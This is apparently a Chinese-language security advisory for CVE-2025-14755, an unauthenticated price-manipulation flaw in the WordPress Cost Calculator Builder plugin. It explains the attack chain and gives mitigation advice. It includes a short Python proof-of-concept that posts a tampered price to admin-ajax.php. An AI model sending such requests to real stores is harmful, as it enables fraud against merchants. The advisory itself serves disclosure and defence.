CVE-2025-14755 CVSS 5.3 中危

CVE-2025-14755 WordPress插件价格操纵漏洞

披露日期: 2026-05-13

来源: [email protected]

漏洞信息

漏洞编号

CVE-2025-14755

漏洞类型

业务逻辑缺陷/IDOR

CVSS评分

5.3 中危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

WordPress Cost Calculator Builder

漏洞概述

WordPress Cost Calculator Builder插件在4.0.1及以下版本中存在严重的安全缺陷。该漏洞源于未授权的AJAX操作，允许未经身份验证的攻击者利用IDOR漏洞直接操纵WooCommerce购物车中产品的价格。攻击者无需登录即可利用此漏洞，以任意低价购买商品，对电商网站造成经济损失。

技术细节

该漏洞的核心在于插件通过 `wp_ajax_nopriv` 注册了 `ccb_woocommerce_payment` AJAX动作，这意味着该端点无需WordPress身份验证即可被访问。在 `renderWooCommercePayment()` 函数处理逻辑中，系统直接将用户可控的数据传递给 `CCBWooCheckout::init()` 方法，且在此过程中完全缺失了权限校验和价格有效性验证机制。攻击者可以构造恶意的HTTP POST请求，篡改请求参数中的价格字段，从而绕过WooCommerce正常的支付逻辑，将商品以攻击者指定的价格添加到购物车并完成结账。

攻击链分析

STEP 1

1. 信息收集

识别目标站点是否安装了Cost Calculator Builder插件且版本在4.0.1及以下。

STEP 2

2. 发送恶意请求

向 `/wp-admin/admin-ajax.php` 发送未授权的POST请求，参数包含action='ccb_woocommerce_payment'及被篡改的价格数据。

STEP 3

3. 漏洞利用

服务器端因缺少权限校验，直接处理该请求并将修改价格后的商品加入购物车。

STEP 4

4. 造成影响

攻击者以极低价格完成订单支付，导致商家经济损失。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

target_url = "http://example.com/wp-admin/admin-ajax.php"
data = {
    "action": "ccb_woocommerce_payment",
    "product_id": "123",
    "price": "0.01"  # Attacker controlled price
}

response = requests.post(target_url, data=data)
if response.status_code == 200:
    print("[+] Exploit successful! Product added to cart with modified price.")
else:
    print("[-] Exploit failed.")

影响范围

Cost Calculator Builder <= 4.0.1

防御指南

临时缓解措施

建议立即升级插件至最新版本以修复此漏洞。若暂时无法升级，应严格限制对 `wp-admin/admin-ajax.php` 的匿名访问，或通过Web应用防火墙（WAF）规则拦截包含特定 `ccb_woocommerce_payment` 动作的异常请求，并审查现有订单中是否存在异常低价交易。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表